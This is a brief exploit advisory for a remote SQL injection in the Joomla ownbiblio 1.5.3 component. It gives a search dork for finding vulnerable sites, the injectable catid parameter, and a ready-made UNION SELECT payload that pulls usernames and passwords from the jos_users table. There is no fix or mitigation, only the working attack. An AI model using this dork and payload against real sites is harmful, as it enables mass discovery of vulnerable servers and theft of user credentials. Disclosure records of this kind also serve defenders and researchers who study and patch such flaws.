The Joomla ownbiblio component version 1.5.3 suffers from a remote SQL injection vulnerability.
06a62715666675b062aed70859e985fc986d71d5c3cc7ee1a647c1b4d9bcffdf
#############################################################################
# #
# Joomla Component Ownbiblio SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Ownbiblio (com_ownbiblio)"
[~] Version: "1.5.3"
[~] Author: "Sebastian Kruvinnus, Michael Kehrwecker"
########################################
[~] DORK: inurl:"com_ownbiblio" catalogue
########################################
[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
########################################